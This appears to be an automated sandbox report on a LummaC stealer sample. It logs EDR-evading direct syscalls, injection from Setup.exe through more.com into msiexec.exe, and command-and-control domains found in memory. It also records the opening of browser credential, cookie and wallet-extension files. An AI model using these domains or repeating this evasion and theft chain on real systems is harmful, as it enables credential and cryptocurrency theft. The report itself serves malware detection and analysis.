                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Horizon Client
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BB559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PhgfSoVrt
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: powershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Player
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: msiexec.exe, 0000000A.00000003.2089435282.0000000005560000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FFBA1A56CC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FFBA1A56CC0

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x23500280000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x18710Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtCreateFile: Direct from: 0xDC00000080Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtClose: Direct from: 0x7FFBC99E79FC
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtAllocateVirtualMemory: Direct from: 0x7FFBC99F8E14Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtQuerySystemInformation: Direct from: 0x25600000000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0xAA11915C9Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtQuerySystemInformation: Direct from: 0x7FFBC99E6118Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x29C04821890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtClose: Direct from: 0x7FFBC99ECDF8
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtCreateNamedPipeFile: Direct from: 0x7FFBC99E2E4EJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtCreateNamedPipeFile: Direct from: 0x7FFBC99E2E70Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtCreateFile: Direct from: 0x25600000080Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtCreateFile: Direct from: 0x7FFBC99E516DJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtAllocateVirtualMemory: Direct from: 0x7FFBC99E60D4Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x7FFBCB7626A1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtCreateFile: Direct from: 0x29C00000080Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtCreateFile: Direct from: 0xF600000080Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtClose: Direct from: 0x9F38B9D6A0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x7FFBC99E3FBBJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtQuerySystemInformation: Direct from: 0x29C00000000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtQueryValueKey: Direct from: 0xDC440FD830Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x25600280000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0xA9BC97C3DJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtCreateFile: Direct from: 0x240Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtReadFile: Direct from: 0x1EF590Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtClose: Direct from: 0x100
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtClose: Direct from: 0x2563DE6A9D0
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x2563E09BE00Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtAllocateVirtualMemory: Direct from: 0x7FFBC99E3637Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x29C06A924F9Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtReadFile: Direct from: 0x224Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtQueryAttributesFile: Direct from: 0x7FFBC99E545EJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtCreateFile: Direct from: 0x204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtDelayExecution: Direct from: 0xF601B6DC50Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtAllocateVirtualMemory: Direct from: 0x40Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtReadFile: Direct from: 0x1E0Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtDelayExecution: Direct from: 0xDC440FD7F0Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtQueryValueKey: Direct from: 0xF601B6DC90Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeNtProtectVirtualMemory: Direct from: 0x2564020B4F9Jump to behavior
                    LummaC encrypted strings found
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
                    Source: more.com, 00000008.00000002.2013644668.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 5ptit5tuded.cyou
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: read writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: AA9330Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 5FB008Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: AA9330Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2F8A008Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe "C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exeCode function: 4_2_00007FF6689519D4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF6689519D4
                    Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: msiexec.exe, 0000000A.00000003.2179484797.0000000000752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                    Source: msiexec.exe, 0000000A.00000003.2179484797.0000000000752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                    Source: msiexec.exe, 0000000A.00000003.2132155751.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                    Source: msiexec.exe, 0000000A.00000003.2179484797.0000000000752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: msiexec.exe, 0000000A.00000003.2139032960.000000000076E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                    Source: msiexec.exe, 0000000A.00000003.2179484797.0000000000752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                    Source: msiexec.exe, 0000000A.00000003.2132155751.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: msiexec.exe, 0000000A.00000003.2132155751.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
